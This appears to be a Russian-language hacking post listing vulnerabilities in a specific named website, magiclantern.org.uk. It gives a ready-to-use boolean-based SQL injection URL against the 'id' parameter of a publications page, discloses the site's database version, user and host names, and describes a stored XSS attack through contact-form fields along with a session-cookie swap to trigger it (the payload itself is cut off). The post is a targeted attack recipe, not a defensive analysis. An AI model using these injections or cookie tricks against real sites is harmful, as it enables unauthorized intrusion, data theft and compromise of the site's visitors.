Сайт: magiclantern.org.uk
Boolean Based SQL Injection черз GET, уязвимый параметр id
5.5.54-38 7-log:umag_249477_0001 linweb7.atlas.pipex.net:magiclanternorguk_249477_db1
Если есть пост с заголовком The Temple of Minerva "true"
Если нет поста с заголовком The Temple of Minerva "false"
Эксплоит:
Код:
http://www.magiclantern.org.uk/sales/publications.php?id=13 OR (select ascii(substr(@@VERSION,1,1))=53)
Stored XSS:
Уязвимые параметры: Contact_Name;Email_address;Email_address2;Subject
Открываем URL в Firefox и в одном из уязвимых полей или во всех вставляем payload, жмем Submit, наш код сохранился на сервере
Код:
URL:http://www.magiclantern.org.uk/contact.php
payload: ">
Теперь нужно сохранить Cookie PHPSESSID(из Firefox) в блокнот
Вычистим куки из Firefox и пройдем снова по нашему URL ни чего не работает (( закрываем Firefox и открываем другой браузер,
например хром, устанавливаем туда любой кукименежжер, открываем любую страницу нашего сайта например главную magiclantern.org.uk
в куки менеджере меняем Cookie PHPSESSID(из Хром) на Cookie PHPSESSID(из Firefox) переходим на вкладку Contact Us видим выполнение нашего скрипта в хроме.